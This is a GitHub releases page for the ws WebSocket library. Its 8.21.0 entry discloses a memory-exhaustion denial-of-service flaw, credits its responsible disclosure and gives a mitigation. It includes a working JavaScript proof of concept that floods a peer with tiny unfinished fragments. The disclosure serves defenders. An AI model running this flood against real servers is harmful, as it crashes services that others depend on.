Skip to content

Releases: websockets/ws

7.5.13

Choose a tag to compare

@lpinca lpinca released this 17 Jul 16:41

Bug fixes

  • Fixed a bug introduced in version 7.5.12 that prevented the fragment counter
    from resetting (18bcb11).

6.2.6

Choose a tag to compare

@lpinca lpinca released this 17 Jul 16:41

Bug fixes

  • Fixed a bug introduced in version 6.2.5 that prevented the fragment counter
    from resetting (899bf9e).

5.2.7

Choose a tag to compare

@lpinca lpinca released this 17 Jul 16:41

Bug fixes

  • Fixed a bug introduced in version 5.2.6 that prevented the fragment counter
    from resetting (504a6ef).

8.21.1

Choose a tag to compare

@lpinca lpinca released this 14 Jul 16:54

Bug fixes

  • Empty fragments are now counted toward the limit (a2f4e7c).
  • The default values of the maxBufferedChunks and maxFragments options have
    been reduced (f197ac6).

7.5.12

Choose a tag to compare

@lpinca lpinca released this 14 Jul 16:53

Bug fixes

6.2.5

Choose a tag to compare

@lpinca lpinca released this 14 Jul 16:52

Bug fixes

5.2.6

Choose a tag to compare

@lpinca lpinca released this 14 Jul 16:51

Bug fixes

8.21.0

Choose a tag to compare

@lpinca lpinca released this 22 May 18:03

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd4).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd4).

A high volume of tiny fragments and data chunks could be sent by a peer, using
modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';

const wss = new WebSocketServer({ port: 0 }, function () {
  const data = Buffer.alloc(1);
  const options = { fin: false };
  const { port } = wss.address();
  const ws = new WebSocket(`ws://localhost:${port}`);

  ws.on('open', function () {
    (function send() {
      ws.send(data, options, function (err) {
        if (err) return;
        send();
      });
    })();
  });

  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`client close - code: ${code} reason: ${reason.toString()}`);
  });
});

wss.on('connection', function (ws) {
  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`server close - code: ${code} reason: ${reason.toString()}`);
  });
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the
maxPayload option if possible.

7.5.11

Choose a tag to compare

@lpinca lpinca released this 22 May 18:03

Bug fixes

6.2.4

Choose a tag to compare

@lpinca lpinca released this 22 May 18:03

Bug fixes